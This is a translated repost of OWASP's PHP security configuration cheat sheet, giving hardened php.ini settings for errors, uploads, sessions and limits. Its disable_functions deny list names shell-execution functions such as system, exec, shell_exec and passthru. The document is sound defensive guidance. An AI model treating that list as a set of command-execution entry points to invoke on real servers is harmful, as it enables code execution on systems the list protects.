PHP security configuration cheat sheet maintained by OWASP

Introduction

The purpose of this page is to help those configuring PHP and the web servers that run it to ensure its security.

Below you will find the correct configuration information for the php.ini file.

php.ini

Some of the following settings need to be adapted to your system, especially session.save_path, session.cookie_path (for example: /var/www/mysite) , and session.cookie_domain (for example: ExampleSite.com).

You should also be running PHP 7.2 or higher. If you are running PHP 7.0 and PHP 7.1, you will use slightly different values ​​in a few places below (see inline comments).

Finally, check out the PHP documentation for a reference on each value in the php.ini configuration file.

You can find a copy of the following configuration in a ready-made php.ini file here .

PHP Error Handling

expose_php              = Off
error_reporting         = E_ALL
display_errors          = Off
display_startup_errors  = Off
log_errors              = On
error_log               = /valid_path/PHP-logs/php_error.log
ignore_repeated_errors  = Off

Please note: You need to set display_errors to Off in the production environment, and it is best to develop a good habit of checking these logs frequently.

PHP Common Settings

doc_root                = /path/DocumentRoot/PHP-scripts/
open_basedir            = /path/DocumentRoot/PHP-scripts/
include_path            = /path/PHP-pear/
extension_dir           = /path/PHP-extensions/
mime_magic.magicfile    = /path/PHP-magic.mime
allow_url_fopen         = Off
allow_url_include       = Off
variables_order         = "GPCS"
allow_webdav_methods    = Off
session.gc_maxlifetime  = 600

allow_url_* It is easy to have LFI and RFI complete vulnerabilities.

PHP Upload File Processing

file_uploads            = On
upload_tmp_dir          = /path/PHP-uploads/
upload_max_filesize     = 2M
max_file_uploads        = 2

If your application does not use the file upload function, or the only way for users to input uploads is through a form that does not contain document attachments To submit, file_uploads should be set to Off.

PHP executable processing

enable_dl               = Off
disable_functions       = system, exec, shell_exec, passthru, phpinfo, show_source, highlight_file, popen, proc_open, fopen_with_path, dbmopen, dbase_open, putenv, move_uploaded_file, chdir, mkdir, rmdir, chmod, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo
# 请查看：http://ir.php.net/features.safe-mode
disable_classes         =

The above are dangerous methods and classes in PHP. You should disable methods and classes that are not used.

PHP session processing

There are some values ​​that need to be paid attention to in the Session settings. It is a good exercise to change session.name to a new one.

 session.save_path                = /path/PHP-session/
 session.name                     = myPHPSESSID
 session.auto_start               = Off
 session.use_trans_sid            = 0
 session.cookie_domain            = full.qualified.domain.name
 #session.cookie_path             = /application/path/
 session.use_strict_mode          = 1
 session.use_cookies              = 1
 session.use_only_cookies         = 1
 session.cookie_lifetime          = 14400 # 4小时 
 session.cookie_secure            = 1
 session.cookie_httponly          = 1
 session.cookie_samesite          = Strict
 session.cache_expire             = 30 
 session.sid_length               = 256
 session.sid_bits_per_character   = 6 # PHP 7.2+
 session.hash_function            = 1 # PHP 7.0-7.1
 session.hash_bits_per_character  = 6 # PHP 7.0-7.1

More checks for security risks

session.referer_check   = /application/path
memory_limit            = 50M
post_max_size           = 20M
max_execution_time      = 60
report_memleaks         = On
track_errors            = Off
html_errors             = Off

English original address:

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets /PHP_Configuration_Cheat_Sheet.md

The above is the detailed content of PHP security configuration cheat sheet maintained by OWASP. For more information, please follow other related articles on the PHP Chinese website!